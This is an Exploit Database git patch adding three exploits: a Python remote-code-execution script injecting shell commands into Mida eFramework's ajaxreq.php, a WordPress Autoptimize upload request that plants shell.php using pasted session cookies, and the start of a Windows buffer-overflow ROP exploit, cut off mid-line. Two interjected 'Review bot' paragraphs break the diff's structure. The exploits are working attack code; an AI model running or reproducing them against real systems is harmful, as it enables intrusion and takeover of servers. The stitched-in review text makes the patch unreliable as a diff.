From 2621b3c52e731cdd893a526a7734fb28b1b52693 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 28 Aug 2020 05:01:55 +0000
Subject: [PATCH] DB: 2020-08-28
3 changes to exploits/shellcodes
ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)
Mida eFramework 2.9.0 - Remote Code Execution
Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)
---
exploits/multiple/webapps/48768.py | 72 ++++++++++++++++
exploits/php/webapps/48770.txt | 84 ++++++++++++++++++
exploits/windows/local/48769.py | 133 +++++++++++++++++++++++++++++
files_exploits.csv | 3 +
4 files changed, 292 insertions(+)
create mode 100755 exploits/multiple/webapps/48768.py
create mode 100644 exploits/php/webapps/48770.txt
create mode 100755 exploits/windows/local/48769.py
diff --git a/exploits/multiple/webapps/48768.py b/exploits/multiple/webapps/48768.py
new file mode 100755
index 000000000..84ed0200b
--- /dev/null
+++ b/exploits/multiple/webapps/48768.py
@@ -0,0 +1,72 @@
+# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution
+# Google Dork: Server: Mida eFramework
+# Date: 2020-08-27
+# Exploit Author: elbae
+# Vendor Homepage: https://www.midasolutions.com/
+# Software Link: http://ova-efw.midasolutions.com/
+# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+# Version: <= 2.9.0
+# CVE : CVE-2020-15920
+
+
+#! /usr/bin/python3
+# -*- coding: utf-8 -*-
+
+import argparse
+import requests
+import subprocess
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+def print_disclaimer():
+ print("""
+ ---------------------
+ Disclaimer:
+ 1) For testing purpose only.
+ 2) Do not attack production environments.
+ 3) Intended for educational purposes only and cannot be used for law
+violation or personal gain.
+ 4) The author is not responsible for any possible harm caused by this
+material.
+ ---------------------""")
+
+
+def print_info():
+ print("""
+[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920)
+[*] Reference:
+https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability
+(RCE) in PDC/ajaxreq.php
+ Version\t< 2.9.0\t./CVE-2020-15920
+http://192.168.1.60:8090/PDC/ajaxreq.php id
+ Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php
+id """)
+
+def pwn(url,cmd):
+ running = """
+[*] Target URL: {0}
+[*] Command: {1}
+ """
+ print(running.format(url,cmd))
+ data = {
+ "DIAGNOSIS":"PING",
+ "PARAM":"127.0.0.1 -c 0; {0}".format(cmd)
+ }
+ r = requests.post(url,data=data,verify=False)
+ line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]"
+ pretty_output = r.text.replace('
','\n')
+ print(line+"\n{0}\n".format(pretty_output)+line)
+
+def main():
+ print_info()
+ print_disclaimer()
+ parser = argparse.ArgumentParser()
+ parser.add_argument("target", type=str, help="the complete target URL")
+ parser.add_argument("cmd", type=str, help="the command you want to run")
+ args = parser.parse_args()
+ pwn(args.target, args.cmd)
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/48770.txt b/exploits/php/webapps/48770.txt
new file mode 100644
index 000000000..677ed9fca
--- /dev/null
+++ b/exploits/php/webapps/48770.txt
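Review bot: The `#! /usr/bin/python3` line is not recognised as a shebang because it follows the nine-line comment header rather than being line 1, yet the file is created with mode 100755, so a direct `./48768.py` invocation would not be handed to the Python interpreter; either move it to the first line or drop the executable bit. `import subprocess` is never referenced anywhere in the hunk and should be removed. In `pwn`, `requests.post(url,data=data,verify=False)` has no `timeout=`, so an unresponsive host blocks the script indefinitely and a refused connection surfaces as an unhandled traceback; `r = requests.post(url, data=data, verify=False, timeout=10)` wrapped in `try`/`except requests.RequestException` would make both failures explicit.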
@@ -0,0 +1,84 @@
+# Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)
+# Date: 2020-08-24
+# Software Link: https://wordpress.org/plugins/autoptimize/
+# Author : SunCSR Team
+# Version: v2.7.6
+# Tested on Ubuntu 18.04 / Kali Linux
+# Reference: https://wpvulndb.com/vulnerabilities/10372
+
+Description :
+-------------------------------------------------------------------
+
+The ao_ccss_import AJAX call does not ensure that the file provided is a
+legitimate Zip file, allowing high privilege users to upload arbitrary
+files, such as PHP, leading to RCE.
+
+[POC]
+
+Step 1 :
+POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Host: pwnme
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101
+Firefox/80.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://pwnme.me/wordpress/wp-admin/options-general.php?page=ao_critcss
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------26086940735210916964189813544
+Content-Length: 685
+Origin: http://pwnme
+Connection: close
+Cookie: autoptimize_feed=1;
+wordpress_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7Cc2f54fb4e357d2c591b7e5f53e6adb9531b0de5cc5fbc3cab3185f63917307cd;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7C409cbfa6f750ff5902273e879e79d9f746c038c35228c978ea9cc3525eb12602;
+wp-settings-time-1=1598516614
+
+
+-----------------------------404272946439029073744006559647
+Content-Disposition: form-data; name="file"; filename="shell.php"
+Content-Type: application/zip
+
+
+-----------------------------404272946439029073744006559647
+Content-Disposition: form-data; name="action"
+
+ao_ccss_import
+-----------------------------404272946439029073744006559647
+Content-Disposition: form-data; 
name="ao_ccss_import_nonce"
+
+f25ca64f22
+-----------------------------404272946439029073744006559647--
+
+
+[Response]
+
+HTTP/1.1 200 OK
+Server: nginx/1.14.0 (Ubuntu)
+Date: Thu, 27 Aug 2020 08:21:08 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+Access-Control-Allow-Origin: http://pwnme.me
+Access-Control-Allow-Credentials: true
+X-Robots-Tag: noindex
+X-Content-Type-Options: nosniff
+Expires: Wed, 11 Jan 1984 05:00:00 GMT
+Cache-Control: no-cache, must-revalidate, max-age=0
+X-Frame-Options: SAMEORIGIN
+Referrer-Policy: strict-origin-when-cross-origin
+Content-Length: 53
+
+{"code":"200","msg":"Settings imported successfully"}
+
+
+Step 2: Access to
+http://victim//wordpress/wp-content/uploads/ao_ccss/shell.php
+
+
+Recommendations: Update to version 2.7.7
+
+
+Thank you very much!
\ No newline at end of file
diff --git a/exploits/windows/local/48769.py b/exploits/windows/local/48769.py
new file mode 100755
index 000000000..81891e6ab
--- /dev/null
+++ b/exploits/windows/local/48769.py
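Review bot: The Step 1 request is not a self-consistent transcript: the `Content-Type` header declares `boundary=---------------------------26086940735210916964189813544`, while every part separator in the body uses `-----------------------------404272946439029073744006559647`, and the declared `Content-Length: 685` does not match the body shown either. The 200 response suggests the request actually sent was different from what is pasted, so the record should be re-captured so that header and body agree. The `Cookie` header also publishes the full `wordpress_01c9…` and `wordpress_logged_in_01c9…` session values of the test instance; an advisory should redact those as `<REDACTED>` rather than ship live-looking credentials.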
@@ -0,0 +1,133 @@
+# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC)
+# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-08-25
+# Vulnerable Software: ASX to MP3 converter
+# Version: 3.1.3.7.2010.11.05
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
+
+# Proof of Concept :
+
+# 1.- Run python code: asx_to_mp3_rop_exploit.py
+# 2.- Works on DEP enabled for ASX2MP3Converter.exe
+# 3.- Open "ASX2MP3Converter.exe"
+# 4.- Click on "Load" Button
+# 5.- Select generated file "asx_to_mp3_rop_exploit.wax".
+# 6.- Click on "Open".
+# 7.- Calc.exe runs.
+
+
+#################################################################################################################################################
+
+#Python "asx_to_mp3_rop_exploit.py" Code:
+
+import struct
+file = 'asx_to_mp3_rop_exploit.wax'
+
+
+payload = "http://"
+payload += "A" * 17417 + struct.pack('